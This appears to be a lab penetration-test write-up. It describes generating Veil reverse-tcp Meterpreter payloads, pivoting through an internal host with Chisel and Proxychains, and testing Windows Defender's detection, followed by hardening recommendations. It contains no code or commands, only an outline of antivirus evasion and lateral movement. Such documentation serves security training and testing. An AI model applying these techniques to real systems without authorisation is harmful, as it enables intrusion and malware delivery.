Establishing a Meterpreter Session with Veil and Bypassing Detection

---

Situation:

This exercise involved leveraging the Veil framework to generate a reverse-tcp Meterpreter payload and deliver it to books.artstailor.com. The goal was to test whether Windows Defender could identify the payload dynamically or statically. Pivoting techniques were employed through costumes.artstailor.com to bypass firewall restrictions and deliver the payload.

---

Obstacles:

1. Antivirus Detection:
   • Windows Defender identified both Python and C# payloads at different stages of execution.
   • Python payload was dynamically flagged after brief execution, while the C# payload was immediately flagged.
2. Payload Delivery:
   • File-sharing restrictions and antivirus scanning complicated the transfer of the payload executable.
3. Limited Execution Time:
   • Meterpreter session established by the Python payload was terminated almost immediately by Windows Defender.

---

Actions Taken:

1. Establishing Access to books.artstailor.com:
   • Initiated a remote desktop session to costumes.artstailor.com using administrative credentials.
   • Set up a Chisel proxy and configured Proxychains to forward traffic to books.artstailor.com.
   • Established a second remote desktop session to books.artstailor.com using n.nomen credentials.
2. Generating Payloads with Veil:
   • Created a reverse-tcp Meterpreter payload using Veil, targeting Python and C# for delivery.
   • Configured the Veil handler and Meterpreter resource files (meterp.rc).
   • Used PyInstaller with Wine to package the Python payload into a distributable .exe file.
3. Delivering and Executing Payloads:
   • Shared the distribution directory containing the executable via the /tmp folder on books.artstailor.com.
   • Executed the Python and C# payloads sequentially to observe Windows Defender's behavior.
4. Testing Defender's Response:
   • Noted that the Python payload was dynamically flagged, while the C# payload was immediately identified as malicious.

---

Results:

1. Antivirus Behavior:
   • Python Payload: Briefly established a Meterpreter session before being dynamically terminated by Windows Defender.
   • C# Payload: Statistically flagged and blocked before execution.
2. Access Achieved:
   • Successfully connected to books.artstailor.com and executed payloads despite file-sharing restrictions.
   • Managed to observe payload behavior for analysis purposes.
3. Risk Level:
   • Medium: Payloads were partially successful but highlighted vulnerabilities in pivoting techniques and credential management.

---

Tool Purpose Overview:

Veil:

• A tool for generating payloads designed to evade antivirus detection, used here to create Python and C# reverse-tcp Meterpreter executables.

PyInstaller:

• A Python packaging tool used with Wine to convert Python payloads into executable files for Windows.

Proxychains:

• Configured to route traffic through a Chisel proxy, enabling access to internal hosts like books.artstailor.com.

Chisel:

• A tunneling tool used to create a SOCKS proxy for pivoting and bypassing firewalls.

msfconsole:

• The Metasploit Framework console used to establish and handle Meterpreter sessions.

---

Recommendations:

1. Enhance Antivirus Detection:
   • Regularly update antivirus definitions to detect obfuscated payloads effectively.
   • Employ behavioral analysis tools to identify anomalous execution patterns.
2. Secure Credential Management:
   • Enforce strong password policies for all domain and local accounts.
   • Rotate credentials periodically and monitor for unauthorized access attempts.
3. Limit Internal Access:
   • Restrict remote desktop and proxy access to trusted IPs and users.
   • Implement strict file-sharing policies and scan shared folders for potential threats.
4. Harden Development Environments:
   • Disable or restrict execution of non-signed executables and scripts.
   • Use application whitelisting to control executable permissions.

---

View PDF Document